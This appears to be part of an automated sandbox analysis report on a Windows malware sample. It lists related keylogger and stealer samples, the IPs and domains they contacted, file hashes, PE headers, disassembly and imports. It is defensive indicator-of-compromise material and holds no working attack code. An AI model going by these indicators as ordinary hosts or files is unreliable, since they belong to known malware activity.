                                                                                PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 188.114.96.3
                                                                                z27PAYMENT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 188.114.96.3
                                                                                mail.irco.com.sa7DI4iYwcvw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 46.151.208.21
                                                                                checkip.dyndns.comGYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 158.101.44.242
                                                                                Vn2TyKMJUW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 132.226.8.169
                                                                                rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 132.226.247.73
                                                                                ADSP-21593BBPZ10 Analog Devices, Inc. 5000.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 132.226.247.73
                                                                                Zahlung_09102024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 193.122.130.0
                                                                                #U8a62#U50f9 (RFQ) -RFQ20241010.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 132.226.8.169
                                                                                PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 193.122.6.168
                                                                                SecuriteInfo.com.Win32.DropperX-gen.28977.28876.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 132.226.8.169
                                                                                PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 193.122.130.0
                                                                                z27PAYMENT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 158.101.44.242
                                                                                api.telegram.orgZfzNdscQNj.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 149.154.167.220
                                                                                GYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Vn2TyKMJUW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                ADSP-21593BBPZ10 Analog Devices, Inc. 5000.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Zahlung_09102024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                #U8a62#U50f9 (RFQ) -RFQ20241010.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                p61Wb0tocl.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                sUdsWh0FL4.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                1yvSMiC8Jt.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                TELEGRAMRUZfzNdscQNj.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 149.154.167.220
                                                                                GYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Vn2TyKMJUW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                ADSP-21593BBPZ10 Analog Devices, Inc. 5000.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Zahlung_09102024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                #U8a62#U50f9 (RFQ) -RFQ20241010.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                p61Wb0tocl.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                sUdsWh0FL4.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                1yvSMiC8Jt.exeGet hashmaliciousXWormBrowse
                                                                                • 149.154.167.220
                                                                                CLOUDFLARENETUSZfzNdscQNj.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 104.26.12.205
                                                                                GYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.96.3
                                                                                Vn2TyKMJUW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                perfcc.elfGet hashmaliciousXmrigBrowse
                                                                                • 104.26.12.205
                                                                                foljNJ4bug.exeGet hashmaliciousFormBookBrowse
                                                                                • 172.67.181.150
                                                                                https://trendydigitalbuzze.com.de/YrWXF/Get hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                https://uk01.l.antigena.com/l/gSyI41Gz96sNln53sagX7eNcywQQOoEnYDagSj-Ka4rmvUc~~ge2uUdYhkRZf~qdeCYR20MfqPF0Cl22iQAPA~D-kwryf6JMugP38-hVRau_ADDrbJG64mdp-ZsyZX_NR5Aqy8QOMomREd_j~F2RHekIK09DCim8Shqfhw4hZXnXF1DPP7U2UTL09nH60jVmeQTVNhtpj6BYLNdVUlIVUBIDlYaiNtMQkkHjcq1woyuQdpbGd~TSAUVGet hashmaliciousUnknownBrowse
                                                                                • 104.16.119.9
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.206.204
                                                                                https://na4.docusign.net/Signing/EmailStart.aspx?a=b4cf6218-13ec-46d9-aa5c-10723ebe7e7f&etti=24&acct=d9c705c1-5012-4d8b-98f5-b9c62798fde2&er=efa4815b-08b1-4fe7-b32f-ac28ff7e2554Get hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                ORACLE-BMC-31898USGYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 158.101.44.242
                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                • 144.25.156.114
                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                • 130.61.64.122
                                                                                Zahlung_09102024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 193.122.130.0
                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                • 130.61.64.122
                                                                                PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 193.122.6.168
                                                                                PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 193.122.130.0
                                                                                z27PAYMENT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                • 158.101.44.242
                                                                                bpdv3trzkv.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 158.101.44.242
                                                                                MiLa0yslQQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 193.122.6.168
                                                                                NASHIRNET-ASNNASHIRNETASNSA7DI4iYwcvw.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 46.151.208.21
                                                                                92.249.48.47-skid.x86-2024-07-20T09_04_17.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                • 185.79.251.94
                                                                                Request For Quotation - ( 11 APR 2022) exp. 15 APR 2022.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                • 46.151.208.26
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                54328bd36c14bd82ddaa0c04b25ed9adGYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                Vn2TyKMJUW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                MFSA-MiFID-APS-P2_20241007-Annex2_DOC-R-v1.1.exeGet hashmaliciousUnknownBrowse
                                                                                • 188.114.97.3
                                                                                ADSP-21593BBPZ10 Analog Devices, Inc. 5000.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                Zahlung_09102024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                #U8a62#U50f9 (RFQ) -RFQ20241010.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                PAGO FRAS. AGOSTO 2024..exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                SecuriteInfo.com.Win32.DropperX-gen.28977.28876.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • 188.114.97.3
                                                                                PO.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 188.114.97.3
                                                                                3b5074b1b5d032e5620f69f9f700ff0eZfzNdscQNj.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                • 149.154.167.220
                                                                                GYJ1zSOpOW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Vn2TyKMJUW.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                https://uk01.l.antigena.com/l/gSyI41Gz96sNln53sagX7eNcywQQOoEnYDagSj-Ka4rmvUc~~ge2uUdYhkRZf~qdeCYR20MfqPF0Cl22iQAPA~D-kwryf6JMugP38-hVRau_ADDrbJG64mdp-ZsyZX_NR5Aqy8QOMomREd_j~F2RHekIK09DCim8Shqfhw4hZXnXF1DPP7U2UTL09nH60jVmeQTVNhtpj6BYLNdVUlIVUBIDlYaiNtMQkkHjcq1woyuQdpbGd~TSAUVGet hashmaliciousUnknownBrowse
                                                                                • 149.154.167.220
                                                                                rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                • 149.154.167.220
                                                                                ADSP-21593BBPZ10 Analog Devices, Inc. 5000.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                Zahlung_09102024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                • 149.154.167.220
                                                                                PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                • 149.154.167.220
                                                                                10092024150836 09.10.2024.vbeGet hashmaliciousFormBookBrowse
                                                                                • 149.154.167.220
                                                                                No context
                                                                                Process:C:\Users\user\Desktop\SP0npSA64a.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):276992
                                                                                Entropy (8bit):6.854726002987304
                                                                                Encrypted:false
                                                                                SSDEEP:3072:+x+xhD9VYzYWSp7unPb2/er2DPd23K/VGwmrTX8P+ZCwDCXnu2a:+4KHa7unPb2S2jEK/5m3MP+ZV2a
                                                                                MD5:50651F3099BF4B1B0F337E592BF29D24
                                                                                SHA1:53298656DD8C64F0BB32A7D43153E19A329ADA6C
                                                                                SHA-256:15F89C6671E7309ED7DD39A7817125DCD07F0890894DD04990A9D8DCBABFC709
                                                                                SHA-512:8892A3AFC5DF4A5B8F16B67EABEE383B7CE95A0E757855E3F57B4BE6D477AE85E1EF591135C469602E3FED6E03D5587DC1FC03126F35FFB468413305D23C67FB
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:~..IK4RQN13K..H4.QJ13KFI.4RQJ13KFIH4RQJ13KFIH4RQJ13KFIH4RQJ1.KFIF+._J.:.g.Ix.p.YZ8f9:[5#+\.(''&[&q(T.93'h]<q.~`k+&,Q|\G;.KFIH4RQ.t3K.HK4...W3KFIH4RQ.11JMH.4RuN13_FIH4RQDr7KFiH4R1N13K.IH.RQJ33KBIH4RQJ17KFIH4RQJ.7KFKH4RQJ11K..H4BQJ!3KFIX4RAJ13KFIX4RQJ13KFIH4..N1|KFIHTVQ]!3KFIH4RQJ13KFIH4RQJ.7KJIH4RQJ13KFIH4RQJ13KFIH4RQJ13KFIH4RQJ13KFIH4RQJ13KFIH.RQB13KFIH4RQJ1;kFI.4RQJ13KFIH4|%/IGKFI\.VQJ.3KFmL4RSJ13KFIH4RQJ13KfIHT|#9CPKFI_$RQJQ7KF[H4RwN13KFIH4RQJ13K.IHt|#/]\(FID4RQJ.7KFKH4RiN13KFIH4RQJ13K.IHvRQJ13KFIH4RQJ13K..L4RQJ1{KFIJ4WQn.1K..I4QQJ1.KFO$.PQ.13KFIH4RQJ13KFIH4RQJ13KFIH4RQJ13KFIH4RQJ13K.4.;..X@.IH4RQJ01HBO@<RQJ13KFI64RQ.13K.IH4eQJ1.KFI%4RQn13K8IH4,QJ1WKFI:4RQ+13K.IH4=QJ1]KFI64RQT3.kFIB.tQH..KFCH.."h13A.HH4V"i13A.KH4V"n13A.JH4V"o13A.MH4V"l13A.LH4V{.10.POH4I>s13AFJ.!TQJ*.mFK`.RQ@1.mFJ.!TQJ*.iFK.=RQN.e8[IH2z.J19?OIH6.[J17aXK`pRQ@..5MIH0yQ`.MGFIL.R{hO>KFMc4xOH.>KFMb.,_J17`FcjJ]QJ5.KlWJ.]QJ5.i8YH4VzJ..5WIH0yQ`.MYFIL.R{hO KFMc4xs4%3KBbH.p/_13OmIb.,GJ17`FcjJEQJ5.Klk6,RQN.3aXK.,RQN.5a$I:.GQ:2
                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.454952786624625
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:SP0npSA64a.exe
                                                                                File size:1'220'337 bytes
                                                                                MD5:ee44a293da0a4abb03fcd00a8e1478ae
                                                                                SHA1:11b6ebc39fbf1888dfafe968c9a5730493eff1d8
                                                                                SHA256:b45b6d05b6f9fc7d8e5f813ebad0961e3a1a0ed432295ba4edc10a826d0f8516
                                                                                SHA512:f092678889628195c65011685b1afcd44b6b319153cc74771c7ac34ac15c81d4a8b0c0ba4fcde46c32fb7b779ab355f31dffe1fb0f9cdedcb4deba42cc79a2b0
                                                                                SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCDL5m0U3K2jFfaROx5Bc2hIPRCvqcH:7JZoQrbTFZY1iaCDL5XqKTcDxhk0qo
                                                                                TLSH:1245E121F5D68076C2B323B19E7EF36A963D79360336D29B27C42D315EA05416B2A733
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                                Icon Hash:1733312925935517
                                                                                Entrypoint:0x4165c1
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:0
                                                                                File Version Major:5
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                                Instruction
                                                                                call 00007F6444D7FEBBh
                                                                                jmp 00007F6444D76D2Eh
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push edi
                                                                                push esi
                                                                                mov esi, dword ptr [ebp+0Ch]
                                                                                mov ecx, dword ptr [ebp+10h]
                                                                                mov edi, dword ptr [ebp+08h]
                                                                                mov eax, ecx
                                                                                mov edx, ecx
                                                                                add eax, esi
                                                                                cmp edi, esi
                                                                                jbe 00007F6444D76EAAh
                                                                                cmp edi, eax
                                                                                jc 00007F6444D77046h
                                                                                cmp ecx, 00000080h
                                                                                jc 00007F6444D76EBEh
                                                                                cmp dword ptr [004A9724h], 00000000h
                                                                                je 00007F6444D76EB5h
                                                                                push edi
                                                                                push esi
                                                                                and edi, 0Fh
                                                                                and esi, 0Fh
                                                                                cmp edi, esi
                                                                                pop esi
                                                                                pop edi
                                                                                jne 00007F6444D76EA7h
                                                                                jmp 00007F6444D77282h
                                                                                test edi, 00000003h
                                                                                jne 00007F6444D76EB6h
                                                                                shr ecx, 02h
                                                                                and edx, 03h
                                                                                cmp ecx, 08h
                                                                                jc 00007F6444D76ECBh
                                                                                rep movsd
                                                                                jmp dword ptr [00416740h+edx*4]
                                                                                mov eax, edi
                                                                                mov edx, 00000003h
                                                                                sub ecx, 04h
                                                                                jc 00007F6444D76EAEh
                                                                                and eax, 03h
                                                                                add ecx, eax
                                                                                jmp dword ptr [00416654h+eax*4]
                                                                                jmp dword ptr [00416750h+ecx*4]
                                                                                nop
                                                                                jmp dword ptr [004166D4h+ecx*4]
                                                                                nop
                                                                                inc cx
                                                                                add byte ptr [eax-4BFFBE9Ah], dl
                                                                                inc cx
                                                                                add byte ptr [ebx], ah
                                                                                ror dword ptr [edx-75F877FAh], 1
                                                                                inc esi
                                                                                add dword ptr [eax+468A0147h], ecx
                                                                                add al, cl
                                                                                jmp 00007F64471EF6A7h
                                                                                add esi, 03h
                                                                                add edi, 03h
                                                                                cmp ecx, 08h
                                                                                jc 00007F6444D76E6Eh
                                                                                rep movsd
                                                                                jmp dword ptr [00000000h+edx*4]
                                                                                Programming Language:
                                                                                • [ C ] VS2010 SP1 build 40219
                                                                                • [C++] VS2010 SP1 build 40219
                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                • [ASM] VS2010 SP1 build 40219
                                                                                • [RES] VS2010 SP1 build 40219
                                                                                • [LNK] VS2010 SP1 build 40219
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                                DLLImport
                                                                                WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
